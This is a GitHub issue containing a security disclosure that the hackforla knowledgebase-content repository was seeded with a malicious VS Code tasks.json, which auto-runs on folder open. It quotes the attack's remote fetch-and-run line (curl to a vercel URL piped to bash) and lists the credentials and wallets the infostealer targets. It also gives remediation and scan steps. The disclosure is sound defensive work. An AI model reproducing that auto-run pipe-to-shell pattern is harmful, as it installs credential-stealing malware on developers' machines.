hackforla / hackforla/knowledgebase-content
Security: Repository contains malicious .vscode/tasks.json (TasksJacker campaign)
- Dominant language
- No language data
- Stars
- 2
- Forks
- 1
- PR merge metrics
- No merged PRs in 30d
Description
## Security Disclosure: This repository has been compromised
The repository **hackforla/knowledgebase-content** was compromised on **February 9, 2026** by the **TasksJacker** campaign — a DPRK-linked supply chain attack. A malicious `.vscode/tasks.json` file was injected that automatically executes malware when anyone opens this repository in VS Code.
**This is not spam.** This disclosure is from the [OpenSourceMalware.com](https://opensourcemalware.com) research team, which first identified and published research on this campaign.
### Compromised file
- **`.vscode/tasks.json`** — contains a task with `"runOn": "folderOpen"` trigger
### What the malicious file does
The `tasks.json` silently executes `curl https://260120.vercel.app/... | bash` when the folder is opened in VS Code. The payload is a multi-stage infostealer and backdoor targeting:
- Browser credentials and cookies
- Cryptocurrency wallet data
- SSH keys and Git credentials
- AWS/cloud credentials and API tokens
### Why this matters for hackforla
As a civic tech organization with community volunteers, any contributor who has cloned and opened this repo in VS Code may have been compromised. We recommend notifying your contributors.
### Immediate remediation steps
1. **Delete `.vscode/tasks.json`** from this repository
2. **Force-push** to remove it from git history
3. **Rotate credentials**: The GitHub account credentials used to push to this repo were compromised — rotate PATs, SSH keys, and passwords
4. **Enable 2FA** on all accounts with push access
5. **Notify contributors** who may have cloned this repo between Feb 9 and now
6. **Scan machines** of anyone with push access:
```bash
ps aux | grep "\.vscode.*node"
ls -la ~/.vscode/node-v*-*/
```
### More information
- Full technical analysis: https://opensourcemalware.com/blog/tasksjacker
- Campaign scope: 354+ repositories across 229+ accounts compromised
- Attribution: DPRK-affiliated threat actors (medium-high confidence)
---
*Disclosed by the [OpenSourceMalware.com](https://opensourcemalware.com) research team.*
Contributor guide
Assessment
This issue has not been assessed yet.